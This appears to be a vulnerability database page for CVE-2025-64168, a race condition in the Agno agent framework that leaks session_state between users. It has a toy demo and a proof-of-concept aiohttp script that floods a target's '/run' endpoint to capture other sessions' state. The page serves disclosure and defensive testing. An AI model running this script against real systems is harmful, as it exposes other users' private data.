Security Vulnerability Report
CVE-2025-64168 CVSS 7.1 HIGH

CVE-2025-64168

Published: 2025-10-31 15:15:43
Last Modified: 2026-04-15 00:35:42

Description

Agno is a multi-agent framework, runtime and control plane. From 2.0.0 to before 2.2.2, under high concurrency, when session_state is passed to Agent or Team during run or arun calls, a race condition can occur, causing a session_state to be assigned and persisted to the incorrect session. This may result in user data from one session being exposed to another user. This has been patched in version 2.2.2.
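To make the bug class concrete, here is an added illustration that is not Agno's code and does not use its API: two toy agents, one that stashes the caller's session_state on the shared agent object for the duration of a run (the pattern the description implies, where a yield inside the run lets another caller overwrite it before it is persisted) and one that keeps the state local to the run. The dict-backed "store" standing in for a session database, the sample session IDs and the `owner` tag are all assumptions constructed for the demo.

```python
import asyncio

# Added illustration of the bug class behind CVE-2025-64168. These two toy
# "agents" are NOT Agno's code; they model the difference between holding the
# caller's session_state on the shared agent object for the duration of a run
# and keeping it local to the run. The persistence store is a plain dict
# keyed by session_id (an assumption standing in for a real session DB).


class SharedStateAgent:
    """Vulnerable model: session_state lives on the agent instance, which
    every concurrent arun() call shares."""

    def __init__(self, store: dict):
        self.store = store          # session_id -> persisted session_state
        self.session_state = None

    async def arun(self, session_id: str, session_state: dict) -> dict:
        self.session_state = session_state      # 1. stash caller state on self
        await asyncio.sleep(0)                   # 2. yield, as awaiting a model/tool call would
        # 3. persist whatever is on self NOW: if another run stashed its state
        #    during the await, that state is written under this session_id.
        self.store[session_id] = dict(self.session_state)
        return self.store[session_id]


class PerRunStateAgent:
    """Hardened model: the state is a local of this run and is never shared."""

    def __init__(self, store: dict):
        self.store = store

    async def arun(self, session_id: str, session_state: dict) -> dict:
        state = dict(session_state)             # private to this call
        await asyncio.sleep(0)
        self.store[session_id] = state
        return state


def find_cross_session_leaks(store: dict) -> dict:
    """Return {session_id: persisted_state} for every session whose persisted
    state carries another session's owner tag."""
    return {sid: st for sid, st in store.items() if st["owner"] != sid}


async def _race(agent, n: int) -> dict:
    # n distinct sessions, each sending state tagged with its own session_id
    # (constructed sample input), all in flight at once.
    await asyncio.gather(*(
        agent.arun(f"session-{i}", {"owner": f"session-{i}", "secret": f"secret-{i}"})
        for i in range(n)
    ))
    return find_cross_session_leaks(agent.store)


def run_demo(n: int = 3) -> tuple:
    """Run the race against both models; returns (vulnerable_leaks, fixed_leaks)."""
    vulnerable = asyncio.run(_race(SharedStateAgent({}), n))
    fixed = asyncio.run(_race(PerRunStateAgent({}), n))
    return vulnerable, fixed


if __name__ == "__main__":
    vuln_leaks, fixed_leaks = run_demo()
    print("shared-state agent leaks:", vuln_leaks)
    print("per-run-state agent leaks:", fixed_leaks)
```

With the default asyncio scheduling the interleaving is deterministic: every run stashes its state before any run reaches the persist step, so the first n-1 sessions end up persisted with the last session's secret while the per-run variant persists nothing out of place. The same `find_cross_session_leaks` check (a persisted state that names a different owner than its session key) is what to run against a real session store when verifying a deployment before and after upgrading to 2.2.2.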

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No NVD configuration (CPE) data is available for this record. Affected range, per the description and the GitHub advisory: Agno >= 2.0.0 and < 2.2.2 (fixed in 2.2.2).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import asyncio
import aiohttp

# PoC for CVE-2025-64168: race condition in Agno session_state handling.
# Fires many concurrent run requests carrying a known session_state and reports
# any response whose persisted session_state differs from what was sent, i.e.
# state that was assigned from another concurrent session.
# NOTE: the '/run' path and the payload shape are the PoC author's assumptions
# about the deployment under test; adjust them to the target's actual API.

EXPECTED_STATE = {
    'user_data': 'sensitive_information',
    'tokens': ['token1', 'token2'],
}


async def _post_run(session: aiohttp.ClientSession, url: str, payload: dict):
    """POST one run request and return (status, decoded JSON body or None)."""
    async with session.post(url, json=payload) as resp:
        try:
            return resp.status, await resp.json(content_type=None)
        except (aiohttp.ContentTypeError, ValueError):
            return resp.status, None


async def exploit_session_leak(target_url: str, session_id: str, requests: int = 100):
    """
    Simulate concurrent requests that may trigger the race condition
    in Agno's session_state handling. Returns one (status, body) tuple
    per request, or the exception raised for that request.
    """
    payload = {
        'session_id': session_id,
        'session_state': dict(EXPECTED_STATE),
        'agent_config': {
            'name': 'test_agent',
            'model': 'gpt-4',
        },
    }
    async with aiohttp.ClientSession() as session:
        # Response bodies must be read while the session is still open, so
        # each request is awaited to completion inside the context manager.
        tasks = [_post_run(session, f'{target_url}/run', payload)
                 for _ in range(requests)]
        return await asyncio.gather(*tasks, return_exceptions=True)


def check_session_leak(responses, expected_state=EXPECTED_STATE):
    """
    Return the responses whose session_state is present but does not match
    the state we sent: that state was persisted from a different session.
    """
    leaked_data = []
    for i, resp in enumerate(responses):
        if isinstance(resp, BaseException):
            continue          # connection error or timeout for this request
        _status, data = resp
        if not isinstance(data, dict):
            continue
        state = data.get('session_state')
        if state and state != expected_state:
            leaked_data.append({
                'response_index': i,
                'leaked_session': state,
            })
    return leaked_data


# Usage
# responses = asyncio.run(exploit_session_leak('http://target:port', 'victim_session_id'))
# print(check_session_leak(responses))
```

References

https://github.com/agno-agi/agno/security/advisories/GHSA-vw84-hprm-cxmm (GitHub Security Advisory, the source of this record)

Weaknesses: CWE-362 (Concurrent Execution using Shared Resource with Improper Synchronization, i.e. race condition), CWE-668 (Exposure of Resource to Wrong Sphere)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64168", "sourceIdentifier": "[email protected]", "published": "2025-10-31T15:15:43.377", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Agno is a multi-agent framework, runtime and control plane. From 2.0.0 to before 2.2.2, under high concurrency, when session_state is passed to Agent or Team during run or arun calls, a race condition can occur, causing a session_state to be assigned and persisted to the incorrect session. This may result in user data from one session being exposed to another user. This has been patched in version 2.2.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}, {"lang": "en", "value": "CWE-668"}]}], "references": [{"url": "https://github.com/agno-agi/agno/security/advisories/GHSA-vw84-hprm-cxmm", "source": "[email protected]"}]}}